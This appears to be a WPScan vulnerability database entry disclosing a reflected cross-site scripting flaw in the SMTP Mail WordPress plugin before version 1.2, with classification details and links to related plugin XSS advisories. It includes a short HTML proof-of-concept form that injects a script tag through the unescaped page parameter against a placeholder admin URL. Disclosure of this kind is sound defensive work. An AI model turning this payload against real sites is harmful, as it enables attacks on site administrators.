SMTP Mail < 1.2 – Reflected Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The plugin does not escape its page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=smtpmail-setting&tab=list" method="POST">
      <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 1.2

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

702478ee-6817-4c6f-acaf-26999725a431

Timeline

Publicly Published

2021-08-24 (about 4 years ago)

Added

2021-08-24 (about 4 years ago)

Last Updated

2021-08-24 (about 4 years ago)

Other

Published

Title

Published

2024-11-08

Title

WP PagSeguro Payments <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2021-04-21

Title

RSS for Yandex Turbo < 1.30 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2022-06-27

Title

Woo Discount Rules < 2.4.2 - Reflected Cross-Site Scripting

Published

2025-01-16

Title

Admin Menu Organizer <= 1.0.1 - Reflected Cross-Site Scripting

Published

2024-03-28

Title

Mang Board WP < 1.8.1 - Reflected Cross-Site Scripting